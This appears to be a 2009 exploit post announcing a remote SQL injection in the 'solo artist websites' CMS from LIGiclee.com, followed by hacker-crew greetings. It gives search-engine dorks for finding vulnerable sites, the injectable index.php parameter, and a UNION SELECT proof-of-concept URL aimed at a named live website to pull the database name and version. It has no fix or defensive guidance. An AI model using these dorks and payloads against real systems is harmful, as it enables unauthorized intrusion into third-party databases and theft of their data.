Solo Artist websites suffer from a remote SQL injection vulnerability.
091da3a309c6e3d2c31d335ce30251e3a502860a8ac1f4f060090592ac9a9c62
#*******************************************************************************************#
#Title : solo artist websites [Remote SQL injection]
#*******************************************************************************************#
#Software : solo artist websites
#vendor : LIGiclee.com
#OrderPage : http://webspaceforart.com/index.php
#Date : 08/13/2009 [Indonesia]
#Author : S3T4N
#Contact : root[at]sux0r.net
#Blog : http://sux0r.net
#*******************************************************************************************#
#[o]Vulnerable file
#index.php
#*******************************************************************************************#
#[o] Dork
#intext:Powered by ligiclee.com
#inurl:/index.php?part=fineart&articles_id=
#*******************************************************************************************#
#[o] Exploit
#http://target/index.php?part=fineart&articles_id=[SQL]
#*******************************************************************************************#
#[o] POC [pull database name and version]
#http://www.fordweisberg.com/index.php?part=fineart&articles_id=-2540%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,database(),15,16,17,18,19,20,version(),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,67--
#*******************************************************************************************#
#[o] Greetz
#MainHack Brotherhood - www.ServerIsDown.org - www.sux0r.net
#www.packetstormsecurity.org
#VOP Crew [ Vaksin13 * OoN_Boy * Paman ]
#R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro
#zxvf * Pizzyroot * iwannine
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]
#special to Bu Rosa, maap udah selalu merepotkan tiap semester :D
#*******************************************************************************************#